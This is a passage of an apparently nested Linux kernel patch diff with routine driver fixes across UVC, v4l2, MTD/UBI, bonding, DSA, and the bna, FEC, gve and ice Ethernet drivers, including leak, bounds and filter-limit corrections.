+@@ -1959,7 +1959,13 @@ static int uvc_ctrl_get_flags(struct uvc_device *dev,
+ 	else
+ 		ret = uvc_query_ctrl(dev, UVC_GET_INFO, ctrl->entity->id,
+ 				     dev->intfnum, info->selector, data, 1);
+-	if (!ret)
++
++	if (!ret) {
++		info->flags &= ~(UVC_CTRL_FLAG_GET_CUR |
++				 UVC_CTRL_FLAG_SET_CUR |
++				 UVC_CTRL_FLAG_AUTO_UPDATE |
++				 UVC_CTRL_FLAG_ASYNCHRONOUS);
++
+ 		info->flags |= (data[0] & UVC_CONTROL_CAP_GET ?
+ 				UVC_CTRL_FLAG_GET_CUR : 0)
+ 			    |  (data[0] & UVC_CONTROL_CAP_SET ?
+@@ -1968,6 +1974,7 @@ static int uvc_ctrl_get_flags(struct uvc_device *dev,
+ 				UVC_CTRL_FLAG_AUTO_UPDATE : 0)
+ 			    |  (data[0] & UVC_CONTROL_CAP_ASYNCHRONOUS ?
+ 				UVC_CTRL_FLAG_ASYNCHRONOUS : 0);
++	}
+ 
+ 	kfree(data);
+ 	return ret;
+diff --git a/drivers/media/usb/uvc/uvc_video.c b/drivers/media/usb/uvc/uvc_video.c
+index 0d3a3b697b2d8..a5ad3ff8bdbb9 100644
+--- a/drivers/media/usb/uvc/uvc_video.c
++++ b/drivers/media/usb/uvc/uvc_video.c
+@@ -705,11 +705,11 @@ void uvc_video_clock_update(struct uvc_streaming *stream,
+ 	unsigned long flags;
+ 	u64 timestamp;
+ 	u32 delta_stc;
+-	u32 y1, y2;
++	u32 y1;
+ 	u32 x1, x2;
+ 	u32 mean;
+ 	u32 sof;
+-	u64 y;
++	u64 y, y2;
+ 
+ 	if (!uvc_hw_timestamps_param)
+ 		return;
+@@ -749,7 +749,7 @@ void uvc_video_clock_update(struct uvc_streaming *stream,
+ 	sof = y;
+ 
+ 	uvc_dbg(stream->dev, CLOCK,
+-		"%s: PTS %u y %llu.%06llu SOF %u.%06llu (x1 %u x2 %u y1 %u y2 %u SOF offset %u)\n",
++		"%s: PTS %u y %llu.%06llu SOF %u.%06llu (x1 %u x2 %u y1 %u y2 %llu SOF offset %u)\n",
+ 		stream->dev->name, buf->pts,
+ 		y >> 16, div_u64((y & 0xffff) * 1000000, 65536),
+ 		sof >> 16, div_u64(((u64)sof & 0xffff) * 1000000LLU, 65536),
+@@ -764,7 +764,7 @@ void uvc_video_clock_update(struct uvc_streaming *stream,
+ 		goto done;
+ 
+ 	y1 = NSEC_PER_SEC;
+-	y2 = (u32)ktime_to_ns(ktime_sub(last->host_time, first->host_time)) + y1;
++	y2 = ktime_to_ns(ktime_sub(last->host_time, first->host_time)) + y1;
+ 
+ 	/*
+ 	 * Interpolated and host SOF timestamps can wrap around at slightly
+@@ -785,7 +785,7 @@ void uvc_video_clock_update(struct uvc_streaming *stream,
+ 	timestamp = ktime_to_ns(first->host_time) + y - y1;
+ 
+ 	uvc_dbg(stream->dev, CLOCK,
+-		"%s: SOF %u.%06llu y %llu ts %llu buf ts %llu (x1 %u/%u/%u x2 %u/%u/%u y1 %u y2 %u)\n",
++		"%s: SOF %u.%06llu y %llu ts %llu buf ts %llu (x1 %u/%u/%u x2 %u/%u/%u y1 %u y2 %llu)\n",
+ 		stream->dev->name,
+ 		sof >> 16, div_u64(((u64)sof & 0xffff) * 1000000LLU, 65536),
+ 		y, timestamp, vbuf->vb2_buf.timestamp,
+diff --git a/drivers/media/v4l2-core/v4l2-async.c b/drivers/media/v4l2-core/v4l2-async.c
+index 008a2a3e312e0..7471dbd140409 100644
+--- a/drivers/media/v4l2-core/v4l2-async.c
++++ b/drivers/media/v4l2-core/v4l2-async.c
+@@ -302,6 +302,9 @@ static int v4l2_async_create_ancillary_links(struct v4l2_async_notifier *n,
+ 	    sd->entity.function != MEDIA_ENT_F_FLASH)
+ 		return 0;
+ 
++	if (!n->sd)
++		return 0;
++
+ 	link = media_create_ancillary_link(&n->sd->entity, &sd->entity);
+ 
+ #endif
+diff --git a/drivers/memory/Kconfig b/drivers/memory/Kconfig
+index fac290e48e0b8..15a9e66f031d1 100644
+--- a/drivers/memory/Kconfig
++++ b/drivers/memory/Kconfig
+@@ -178,7 +178,7 @@ config FSL_CORENET_CF
+ 	  represents a coherency violation.
+ 
+ config FSL_IFC
+-	bool "Freescale IFC driver" if COMPILE_TEST
++	bool "Freescale IFC driver"
+ 	depends on FSL_SOC || ARCH_LAYERSCAPE || SOC_LS1021A || COMPILE_TEST
+ 	depends on HAS_IOMEM
+ 
+diff --git a/drivers/mfd/Makefile b/drivers/mfd/Makefile
+index 7ed3ef4a698cf..e26c64bf7cb77 100644
+--- a/drivers/mfd/Makefile
++++ b/drivers/mfd/Makefile
+@@ -276,7 +276,5 @@ obj-$(CONFIG_MFD_INTEL_M10_BMC)   += intel-m10-bmc.o
+ obj-$(CONFIG_MFD_ATC260X)	+= atc260x-core.o
+ obj-$(CONFIG_MFD_ATC260X_I2C)	+= atc260x-i2c.o
+ 
+-rsmu-i2c-objs			:= rsmu_core.o rsmu_i2c.o
+-rsmu-spi-objs			:= rsmu_core.o rsmu_spi.o
+-obj-$(CONFIG_MFD_RSMU_I2C)	+= rsmu-i2c.o
+-obj-$(CONFIG_MFD_RSMU_SPI)	+= rsmu-spi.o
++obj-$(CONFIG_MFD_RSMU_I2C)	+= rsmu_i2c.o rsmu_core.o
++obj-$(CONFIG_MFD_RSMU_SPI)	+= rsmu_spi.o rsmu_core.o
+diff --git a/drivers/mfd/omap-usb-tll.c b/drivers/mfd/omap-usb-tll.c
+index 080d7970a3774..5971b5cb290a1 100644
+--- a/drivers/mfd/omap-usb-tll.c
++++ b/drivers/mfd/omap-usb-tll.c
+@@ -237,8 +237,7 @@ static int usbtll_omap_probe(struct platform_device *pdev)
+ 		break;
+ 	}
+ 
+-	tll = devm_kzalloc(dev, sizeof(*tll) + sizeof(tll->ch_clk[nch]),
+-			   GFP_KERNEL);
++	tll = devm_kzalloc(dev, struct_size(tll, ch_clk, nch), GFP_KERNEL);
+ 	if (!tll) {
+ 		pm_runtime_put_sync(dev);
+ 		pm_runtime_disable(dev);
+diff --git a/drivers/mfd/rsmu_core.c b/drivers/mfd/rsmu_core.c
+index 29437fd0bd5bf..fd04a6e5dfa31 100644
+--- a/drivers/mfd/rsmu_core.c
++++ b/drivers/mfd/rsmu_core.c
+@@ -78,11 +78,13 @@ int rsmu_core_init(struct rsmu_ddata *rsmu)
+ 
+ 	return ret;
+ }
++EXPORT_SYMBOL_GPL(rsmu_core_init);
+ 
+ void rsmu_core_exit(struct rsmu_ddata *rsmu)
+ {
+ 	mutex_destroy(&rsmu->lock);
+ }
++EXPORT_SYMBOL_GPL(rsmu_core_exit);
+ 
+ MODULE_DESCRIPTION("Renesas SMU core driver");
+ MODULE_LICENSE("GPL");
+diff --git a/drivers/mtd/nand/raw/Kconfig b/drivers/mtd/nand/raw/Kconfig
+index 4cd40af362de2..900b121219394 100644
+--- a/drivers/mtd/nand/raw/Kconfig
++++ b/drivers/mtd/nand/raw/Kconfig
+@@ -248,8 +248,7 @@ config MTD_NAND_FSL_IFC
+ 	tristate "Freescale IFC NAND controller"
+ 	depends on FSL_SOC || ARCH_LAYERSCAPE || SOC_LS1021A || COMPILE_TEST
+ 	depends on HAS_IOMEM
+-	select FSL_IFC
+-	select MEMORY
++	depends on FSL_IFC
+ 	help
+ 	  Various Freescale chips e.g P1010, include a NAND Flash machine
+ 	  with built-in hardware ECC capabilities.
+diff --git a/drivers/mtd/tests/Makefile b/drivers/mtd/tests/Makefile
+index 5de0378f90dbd..7dae831ee8b6b 100644
+--- a/drivers/mtd/tests/Makefile
++++ b/drivers/mtd/tests/Makefile
+@@ -1,19 +1,19 @@
+ # SPDX-License-Identifier: GPL-2.0
+-obj-$(CONFIG_MTD_TESTS) += mtd_oobtest.o
+-obj-$(CONFIG_MTD_TESTS) += mtd_pagetest.o
+-obj-$(CONFIG_MTD_TESTS) += mtd_readtest.o
+-obj-$(CONFIG_MTD_TESTS) += mtd_speedtest.o
+-obj-$(CONFIG_MTD_TESTS) += mtd_stresstest.o
+-obj-$(CONFIG_MTD_TESTS) += mtd_subpagetest.o
+-obj-$(CONFIG_MTD_TESTS) += mtd_torturetest.o
+-obj-$(CONFIG_MTD_TESTS) += mtd_nandecctest.o
+-obj-$(CONFIG_MTD_TESTS) += mtd_nandbiterrs.o
++obj-$(CONFIG_MTD_TESTS) += mtd_oobtest.o mtd_test.o
++obj-$(CONFIG_MTD_TESTS) += mtd_pagetest.o mtd_test.o
++obj-$(CONFIG_MTD_TESTS) += mtd_readtest.o mtd_test.o
++obj-$(CONFIG_MTD_TESTS) += mtd_speedtest.o mtd_test.o
++obj-$(CONFIG_MTD_TESTS) += mtd_stresstest.o mtd_test.o
++obj-$(CONFIG_MTD_TESTS) += mtd_subpagetest.o mtd_test.o
++obj-$(CONFIG_MTD_TESTS) += mtd_torturetest.o mtd_test.o
++obj-$(CONFIG_MTD_TESTS) += mtd_nandecctest.o mtd_test.o
++obj-$(CONFIG_MTD_TESTS) += mtd_nandbiterrs.o mtd_test.o
+ 
+-mtd_oobtest-objs := oobtest.o mtd_test.o
+-mtd_pagetest-objs := pagetest.o mtd_test.o
+-mtd_readtest-objs := readtest.o mtd_test.o
+-mtd_speedtest-objs := speedtest.o mtd_test.o
+-mtd_stresstest-objs := stresstest.o mtd_test.o
+-mtd_subpagetest-objs := subpagetest.o mtd_test.o
+-mtd_torturetest-objs := torturetest.o mtd_test.o
+-mtd_nandbiterrs-objs := nandbiterrs.o mtd_test.o
++mtd_oobtest-objs := oobtest.o
++mtd_pagetest-objs := pagetest.o
++mtd_readtest-objs := readtest.o
++mtd_speedtest-objs := speedtest.o
++mtd_stresstest-objs := stresstest.o
++mtd_subpagetest-objs := subpagetest.o
++mtd_torturetest-objs := torturetest.o
++mtd_nandbiterrs-objs := nandbiterrs.o
+diff --git a/drivers/mtd/tests/mtd_test.c b/drivers/mtd/tests/mtd_test.c
+index c84250beffdc9..f391e0300cdc9 100644
+--- a/drivers/mtd/tests/mtd_test.c
++++ b/drivers/mtd/tests/mtd_test.c
+@@ -25,6 +25,7 @@ int mtdtest_erase_eraseblock(struct mtd_info *mtd, unsigned int ebnum)
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_GPL(mtdtest_erase_eraseblock);
+ 
+ static int is_block_bad(struct mtd_info *mtd, unsigned int ebnum)
+ {
+@@ -57,6 +58,7 @@ int mtdtest_scan_for_bad_eraseblocks(struct mtd_info *mtd, unsigned char *bbt,
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_GPL(mtdtest_scan_for_bad_eraseblocks);
+ 
+ int mtdtest_erase_good_eraseblocks(struct mtd_info *mtd, unsigned char *bbt,
+ 				unsigned int eb, int ebcnt)
+@@ -75,6 +77,7 @@ int mtdtest_erase_good_eraseblocks(struct mtd_info *mtd, unsigned char *bbt,
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_GPL(mtdtest_erase_good_eraseblocks);
+ 
+ int mtdtest_read(struct mtd_info *mtd, loff_t addr, size_t size, void *buf)
+ {
+@@ -92,6 +95,7 @@ int mtdtest_read(struct mtd_info *mtd, loff_t addr, size_t size, void *buf)
+ 
+ 	return err;
+ }
++EXPORT_SYMBOL_GPL(mtdtest_read);
+ 
+ int mtdtest_write(struct mtd_info *mtd, loff_t addr, size_t size,
+ 		const void *buf)
+@@ -107,3 +111,8 @@ int mtdtest_write(struct mtd_info *mtd, loff_t addr, size_t size,
+ 
+ 	return err;
+ }
++EXPORT_SYMBOL_GPL(mtdtest_write);
++
++MODULE_LICENSE("GPL");
++MODULE_DESCRIPTION("MTD function test helpers");
++MODULE_AUTHOR("Akinobu Mita");
+diff --git a/drivers/mtd/ubi/eba.c b/drivers/mtd/ubi/eba.c
+index 4e1d80746b04b..38f41ce72b6ac 100644
+--- a/drivers/mtd/ubi/eba.c
++++ b/drivers/mtd/ubi/eba.c
+@@ -1560,6 +1560,7 @@ int self_check_eba(struct ubi_device *ubi, struct ubi_attach_info *ai_fastmap,
+ 					  GFP_KERNEL);
+ 		if (!fm_eba[i]) {
+ 			ret = -ENOMEM;
++			kfree(scan_eba[i]);
+ 			goto out_free;
+ 		}
+ 
+@@ -1595,7 +1596,7 @@ int self_check_eba(struct ubi_device *ubi, struct ubi_attach_info *ai_fastmap,
+ 	}
+ 
+ out_free:
+-	for (i = 0; i < num_volumes; i++) {
++	while (--i >= 0) {
+ 		if (!ubi->volumes[i])
+ 			continue;
+ 
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 710734a5af9bf..be5348d0b22e5 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -1117,13 +1117,10 @@ static struct slave *bond_find_best_slave(struct bonding *bond)
+ 	return bestslave;
+ }
+ 
++/* must be called in RCU critical section or with RTNL held */
+ static bool bond_should_notify_peers(struct bonding *bond)
+ {
+-	struct slave *slave;
+-
+-	rcu_read_lock();
+-	slave = rcu_dereference(bond->curr_active_slave);
+-	rcu_read_unlock();
++	struct slave *slave = rcu_dereference_rtnl(bond->curr_active_slave);
+ 
+ 	if (!slave || !bond->send_peer_notif ||
+ 	    bond->send_peer_notif %
+diff --git a/drivers/net/dsa/b53/b53_common.c b/drivers/net/dsa/b53/b53_common.c
+index 59cdfc51ce06a..922e5934de733 100644
+--- a/drivers/net/dsa/b53/b53_common.c
++++ b/drivers/net/dsa/b53/b53_common.c
+@@ -2221,6 +2221,9 @@ static int b53_change_mtu(struct dsa_switch *ds, int port, int mtu)
+ 	if (is5325(dev) || is5365(dev))
+ 		return -EOPNOTSUPP;
+ 
++	if (!dsa_is_cpu_port(ds, port))
++		return 0;
++
+ 	enable_jumbo = (mtu >= JMS_MIN_SIZE);
+ 	allow_10_100 = (dev->chip_id == BCM583XX_DEVICE_ID);
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 4938550a67c02..d94b46316a117 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -3606,7 +3606,8 @@ static int mv88e6xxx_change_mtu(struct dsa_switch *ds, int port, int new_mtu)
+ 	mv88e6xxx_reg_lock(chip);
+ 	if (chip->info->ops->port_set_jumbo_size)
+ 		ret = chip->info->ops->port_set_jumbo_size(chip, port, new_mtu);
+-	else if (chip->info->ops->set_max_frame_size)
++	else if (chip->info->ops->set_max_frame_size &&
++		 dsa_is_cpu_port(ds, port))
+ 		ret = chip->info->ops->set_max_frame_size(chip, new_mtu);
+ 	mv88e6xxx_reg_unlock(chip);
+ 
+diff --git a/drivers/net/ethernet/brocade/bna/bna_types.h b/drivers/net/ethernet/brocade/bna/bna_types.h
+index 666b6922e24db..ebf54d74c2bbe 100644
+--- a/drivers/net/ethernet/brocade/bna/bna_types.h
++++ b/drivers/net/ethernet/brocade/bna/bna_types.h
+@@ -410,7 +410,7 @@ struct bna_ib {
+ /* Tx object */
+ 
+ /* Tx datapath control structure */
+-#define BNA_Q_NAME_SIZE		16
++#define BNA_Q_NAME_SIZE		(IFNAMSIZ + 6)
+ struct bna_tcb {
+ 	/* Fast path */
+ 	void			**sw_qpt;
+diff --git a/drivers/net/ethernet/brocade/bna/bnad.c b/drivers/net/ethernet/brocade/bna/bnad.c
+index d6d90f9722a7e..aecdb98f8a9c1 100644
+--- a/drivers/net/ethernet/brocade/bna/bnad.c
++++ b/drivers/net/ethernet/brocade/bna/bnad.c
+@@ -1535,8 +1535,9 @@ bnad_tx_msix_register(struct bnad *bnad, struct bnad_tx_info *tx_info,
+ 
+ 	for (i = 0; i < num_txqs; i++) {
+ 		vector_num = tx_info->tcb[i]->intr_vector;
+-		sprintf(tx_info->tcb[i]->name, "%s TXQ %d", bnad->netdev->name,
+-				tx_id + tx_info->tcb[i]->id);
++		snprintf(tx_info->tcb[i]->name, BNA_Q_NAME_SIZE, "%s TXQ %d",
++			 bnad->netdev->name,
++			 tx_id + tx_info->tcb[i]->id);
+ 		err = request_irq(bnad->msix_table[vector_num].vector,
+ 				  (irq_handler_t)bnad_msix_tx, 0,
+ 				  tx_info->tcb[i]->name,
+@@ -1586,9 +1587,9 @@ bnad_rx_msix_register(struct bnad *bnad, struct bnad_rx_info *rx_info,
+ 
+ 	for (i = 0; i < num_rxps; i++) {
+ 		vector_num = rx_info->rx_ctrl[i].ccb->intr_vector;
+-		sprintf(rx_info->rx_ctrl[i].ccb->name, "%s CQ %d",
+-			bnad->netdev->name,
+-			rx_id + rx_info->rx_ctrl[i].ccb->id);
++		snprintf(rx_info->rx_ctrl[i].ccb->name, BNA_Q_NAME_SIZE,
++			 "%s CQ %d", bnad->netdev->name,
++			 rx_id + rx_info->rx_ctrl[i].ccb->id);
+ 		err = request_irq(bnad->msix_table[vector_num].vector,
+ 				  (irq_handler_t)bnad_msix_rx, 0,
+ 				  rx_info->rx_ctrl[i].ccb->name,
+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index 0a3df468316e5..0a5c3d27ed3b0 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -267,8 +267,8 @@ MODULE_PARM_DESC(macaddr, "FEC Ethernet MAC address");
+ #define PKT_MINBUF_SIZE		64
+ 
+ /* FEC receive acceleration */
+-#define FEC_RACC_IPDIS		(1 << 1)
+-#define FEC_RACC_PRODIS		(1 << 2)
++#define FEC_RACC_IPDIS		BIT(1)
++#define FEC_RACC_PRODIS		BIT(2)
+ #define FEC_RACC_SHIFT16	BIT(7)
+ #define FEC_RACC_OPTIONS	(FEC_RACC_IPDIS | FEC_RACC_PRODIS)
+ 
+@@ -300,8 +300,23 @@ MODULE_PARM_DESC(macaddr, "FEC Ethernet MAC address");
+ #define FEC_MMFR_TA		(2 << 16)
+ #define FEC_MMFR_DATA(v)	(v & 0xffff)
+ /* FEC ECR bits definition */
+-#define FEC_ECR_MAGICEN		(1 << 2)
+-#define FEC_ECR_SLEEP		(1 << 3)
++#define FEC_ECR_RESET           BIT(0)
++#define FEC_ECR_ETHEREN         BIT(1)
++#define FEC_ECR_MAGICEN         BIT(2)
++#define FEC_ECR_SLEEP           BIT(3)
++#define FEC_ECR_EN1588          BIT(4)
++#define FEC_ECR_BYTESWP         BIT(8)
++/* FEC RCR bits definition */
++#define FEC_RCR_LOOP            BIT(0)
++#define FEC_RCR_HALFDPX         BIT(1)
++#define FEC_RCR_MII             BIT(2)
++#define FEC_RCR_PROMISC         BIT(3)
++#define FEC_RCR_BC_REJ          BIT(4)
++#define FEC_RCR_FLOWCTL         BIT(5)
++#define FEC_RCR_RMII            BIT(8)
++#define FEC_RCR_10BASET         BIT(9)
++/* TX WMARK bits */
++#define FEC_TXWMRK_STRFWD       BIT(8)
+ 
+ #define FEC_MII_TIMEOUT		30000 /* us */
+ 
+@@ -1038,7 +1053,7 @@ fec_restart(struct net_device *ndev)
+ 	struct fec_enet_private *fep = netdev_priv(ndev);
+ 	u32 temp_mac[2];
+ 	u32 rcntl = OPT_FRAME_SIZE | 0x04;
+-	u32 ecntl = 0x2; /* ETHEREN */
++	u32 ecntl = FEC_ECR_ETHEREN;
+ 
+ 	/* Whack a reset.  We should wait for this.
+ 	 * For i.MX6SX SOC, enet use AXI bus, we use disable MAC
+@@ -1116,18 +1131,18 @@ fec_restart(struct net_device *ndev)
+ 		    fep->phy_interface == PHY_INTERFACE_MODE_RGMII_TXID)
+ 			rcntl |= (1 << 6);
+ 		else if (fep->phy_interface == PHY_INTERFACE_MODE_RMII)
+-			rcntl |= (1 << 8);
++			rcntl |= FEC_RCR_RMII;
+ 		else
+-			rcntl &= ~(1 << 8);
++			rcntl &= ~FEC_RCR_RMII;
+ 
+ 		/* 1G, 100M or 10M */
+ 		if (ndev->phydev) {
+ 			if (ndev->phydev->speed == SPEED_1000)
+ 				ecntl |= (1 << 5);
+ 			else if (ndev->phydev->speed == SPEED_100)
+-				rcntl &= ~(1 << 9);
++				rcntl &= ~FEC_RCR_10BASET;
+ 			else
+-				rcntl |= (1 << 9);
++				rcntl |= FEC_RCR_10BASET;
+ 		}
+ 	} else {
+ #ifdef FEC_MIIGSK_ENR
+@@ -1186,13 +1201,13 @@ fec_restart(struct net_device *ndev)
+ 
+ 	if (fep->quirks & FEC_QUIRK_ENET_MAC) {
+ 		/* enable ENET endian swap */
+-		ecntl |= (1 << 8);
++		ecntl |= FEC_ECR_BYTESWP;
+ 		/* enable ENET store and forward mode */
+-		writel(1 << 8, fep->hwp + FEC_X_WMRK);
++		writel(FEC_TXWMRK_STRFWD, fep->hwp + FEC_X_WMRK);
+ 	}
+ 
+ 	if (fep->bufdesc_ex)
+-		ecntl |= (1 << 4);
++		ecntl |= FEC_ECR_EN1588;
+ 
+ 	if (fep->quirks & FEC_QUIRK_DELAYED_CLKS_SUPPORT &&
+ 	    fep->rgmii_txc_dly)
+@@ -1291,7 +1306,7 @@ static void
+ fec_stop(struct net_device *ndev)
+ {
+ 	struct fec_enet_private *fep = netdev_priv(ndev);
+-	u32 rmii_mode = readl(fep->hwp + FEC_R_CNTRL) & (1 << 8);
++	u32 rmii_mode = readl(fep->hwp + FEC_R_CNTRL) & FEC_RCR_RMII;
+ 	u32 val;
+ 
+ 	/* We cannot expect a graceful transmit stop without link !!! */
+@@ -1310,7 +1325,7 @@ fec_stop(struct net_device *ndev)
+ 		if (fep->quirks & FEC_QUIRK_HAS_MULTI_QUEUES) {
+ 			writel(0, fep->hwp + FEC_ECNTRL);
+ 		} else {
+-			writel(1, fep->hwp + FEC_ECNTRL);
++			writel(FEC_ECR_RESET, fep->hwp + FEC_ECNTRL);
+ 			udelay(10);
+ 		}
+ 	} else {
+@@ -1324,11 +1339,16 @@ fec_stop(struct net_device *ndev)
+ 	/* We have to keep ENET enabled to have MII interrupt stay working */
+ 	if (fep->quirks & FEC_QUIRK_ENET_MAC &&
+ 		!(fep->wol_flag & FEC_WOL_FLAG_SLEEP_ON)) {
+-		writel(2, fep->hwp + FEC_ECNTRL);
++		writel(FEC_ECR_ETHEREN, fep->hwp + FEC_ECNTRL);
+ 		writel(rmii_mode, fep->hwp + FEC_R_CNTRL);
+ 	}
+-}
+ 
++	if (fep->bufdesc_ex) {
++		val = readl(fep->hwp + FEC_ECNTRL);
++		val |= FEC_ECR_EN1588;
++		writel(val, fep->hwp + FEC_ECNTRL);
++	}
++}
+ 
+ static void
+ fec_timeout(struct net_device *ndev, unsigned int txqueue)
+diff --git a/drivers/net/ethernet/google/gve/gve_tx_dqo.c b/drivers/net/ethernet/google/gve/gve_tx_dqo.c
+index 5147fb37929e0..eabed3deca763 100644
+--- a/drivers/net/ethernet/google/gve/gve_tx_dqo.c
++++ b/drivers/net/ethernet/google/gve/gve_tx_dqo.c
+@@ -596,22 +596,42 @@ static bool gve_can_send_tso(const struct sk_buff *skb)
+ 	const int header_len = skb_tcp_all_headers(skb);
+ 	const int gso_size = shinfo->gso_size;
+ 	int cur_seg_num_bufs;
++	int prev_frag_size;
+ 	int cur_seg_size;
+ 	int i;
+ 
+ 	cur_seg_size = skb_headlen(skb) - header_len;
++	prev_frag_size = skb_headlen(skb);
+ 	cur_seg_num_bufs = cur_seg_size > 0;
+ 
+ 	for (i = 0; i < shinfo->nr_frags; i++) {
+ 		if (cur_seg_size >= gso_size) {
+ 			cur_seg_size %= gso_size;
+ 			cur_seg_num_bufs = cur_seg_size > 0;
++
++			if (prev_frag_size > GVE_TX_MAX_BUF_SIZE_DQO) {
++				int prev_frag_remain = prev_frag_size %
++					GVE_TX_MAX_BUF_SIZE_DQO;
++
++				/* If the last descriptor of the previous frag
++				 * is less than cur_seg_size, the segment will
++				 * span two descriptors in the previous frag.
++				 * Since max gso size (9728) is less than
++				 * GVE_TX_MAX_BUF_SIZE_DQO, it is impossible
++				 * for the segment to span more than two
++				 * descriptors.
++				 */
++				if (prev_frag_remain &&
++				    cur_seg_size > prev_frag_remain)
++					cur_seg_num_bufs++;
++			}
+ 		}
+ 
+ 		if (unlikely(++cur_seg_num_bufs > max_bufs_per_seg))
+ 			return false;
+ 
+-		cur_seg_size += skb_frag_size(&shinfo->frags[i]);
++		prev_frag_size = skb_frag_size(&shinfo->frags[i]);
++		cur_seg_size += prev_frag_size;
+ 	}
+ 
+ 	return true;
+diff --git a/drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c b/drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c
+index 8c6e13f87b7d3..1839a37139dc1 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c
++++ b/drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c
+@@ -531,7 +531,7 @@ ice_parse_rx_flow_user_data(struct ethtool_rx_flow_spec *fsp,
+  *
+  * Returns the number of available flow director filters to this VSI
+  */
+-static int ice_fdir_num_avail_fltr(struct ice_hw *hw, struct ice_vsi *vsi)
++int ice_fdir_num_avail_fltr(struct ice_hw *hw, struct ice_vsi *vsi)
+ {
+ 	u16 vsi_num = ice_get_hw_vsi_num(hw, vsi->idx);
+ 	u16 num_guar;
+diff --git a/drivers/net/ethernet/intel/ice/ice_fdir.h b/drivers/net/ethernet/intel/ice/ice_fdir.h
+index 1b9b844906899..b384d2a4ab198 100644
+--- a/drivers/net/ethernet/intel/ice/ice_fdir.h
++++ b/drivers/net/ethernet/intel/ice/ice_fdir.h
+@@ -202,6 +202,8 @@ struct ice_fdir_base_pkt {
+ 	const u8 *tun_pkt;
+ };
+ 
++struct ice_vsi;
++
+ int ice_alloc_fd_res_cntr(struct ice_hw *hw, u16 *cntr_id);
+ int ice_free_fd_res_cntr(struct ice_hw *hw, u16 cntr_id);
+ int ice_alloc_fd_guar_item(struct ice_hw *hw, u16 *cntr_id, u16 num_fltr);
+@@ -213,6 +215,7 @@ int
+ ice_fdir_get_gen_prgm_pkt(struct ice_hw *hw, struct ice_fdir_fltr *input,
+ 			  u8 *pkt, bool frag, bool tun);
+ int ice_get_fdir_cnt_all(struct ice_hw *hw);
++int ice_fdir_num_avail_fltr(struct ice_hw *hw, struct ice_vsi *vsi);
+ bool ice_fdir_is_dup_fltr(struct ice_hw *hw, struct ice_fdir_fltr *input);
+ bool ice_fdir_has_frag(enum ice_fltr_ptype flow);
+ struct ice_fdir_fltr *
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+index fb8e856933097..bff3e9662a8fd 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+@@ -551,6 +551,8 @@ static void ice_vc_fdir_reset_cnt_all(struct ice_vf_fdir *fdir)
+ 		fdir->fdir_fltr_cnt[flow][0] = 0;
+ 		fdir->fdir_fltr_cnt[flow][1] = 0;
+ 	}
++
++	fdir->fdir_fltr_cnt_total = 0;
+ }
+ 
+ /**
+@@ -1567,6 +1569,7 @@ ice_vc_add_fdir_fltr_post(struct ice_vf *vf, struct ice_vf_fdir_ctx *ctx,
+ 	resp->status = status;
+ 	resp->flow_id = conf->flow_id;
+ 	vf->fdir.fdir_fltr_cnt[conf->input.flow_type][is_tun]++;
++	vf->fdir.fdir_fltr_cnt_total++;
+ 
+ 	ret = ice_vc_send_msg_to_vf(vf, ctx->v_opcode, v_ret,
+ 				    (u8 *)resp, len);
+@@ -1631,6 +1634,7 @@ ice_vc_del_fdir_fltr_post(struct ice_vf *vf, struct ice_vf_fdir_ctx *ctx,
+ 	resp->status = status;
+ 	ice_vc_fdir_remove_entry(vf, conf, conf->flow_id);
+ 	vf->fdir.fdir_fltr_cnt[conf->input.flow_type][is_tun]--;
++	vf->fdir.fdir_fltr_cnt_total--;
+ 
+ 	ret = ice_vc_send_msg_to_vf(vf, ctx->v_opcode, v_ret,
+ 				    (u8 *)resp, len);
+@@ -1797,6 +1801,7 @@ int ice_vc_add_fdir_fltr(struct ice_vf *vf, u8 *msg)
+ 	struct virtchnl_fdir_add *stat = NULL;
+ 	struct virtchnl_fdir_fltr_conf *conf;
+ 	enum virtchnl_status_code v_ret;
++	struct ice_vsi *vf_vsi;
+ 	struct device *dev;
+ 	struct ice_pf *pf;
+ 	int is_tun = 0;
+@@ -1805,6 +1810,17 @@ int ice_vc_add_fdir_fltr(struct ice_vf *vf, u8 *msg)
+ 
+ 	pf = vf->pf;
+ 	dev = ice_pf_to_dev(pf);
++	vf_vsi = ice_get_vf_vsi(vf);
++
++#define ICE_VF_MAX_FDIR_FILTERS	128
++	if (!ice_fdir_num_avail_fltr(&pf->hw, vf_vsi) ||
++	    vf->fdir.fdir_fltr_cnt_total >= ICE_VF_MAX_FDIR_FILTERS) {
++		v_ret = VIRTCHNL_STATUS_ERR_PARAM;
++		dev_err(dev, "Max number of FDIR filters for VF %d is reached\n",
++			vf->vf_id);
++		goto err_exit;
++	}
++
+ 	ret = ice_vc_fdir_param_check(vf, fltr->vsi_id);
+ 	if (ret) {
+ 		v_ret = VIRTCHNL_STATUS_ERR_PARAM;
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.h b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.h
+index c5bcc8d7481ca..ac6dcab454b49 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.h
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.h
+@@ -29,6 +29,7 @@ struct ice_vf_fdir_ctx {
+ struct ice_vf_fdir {
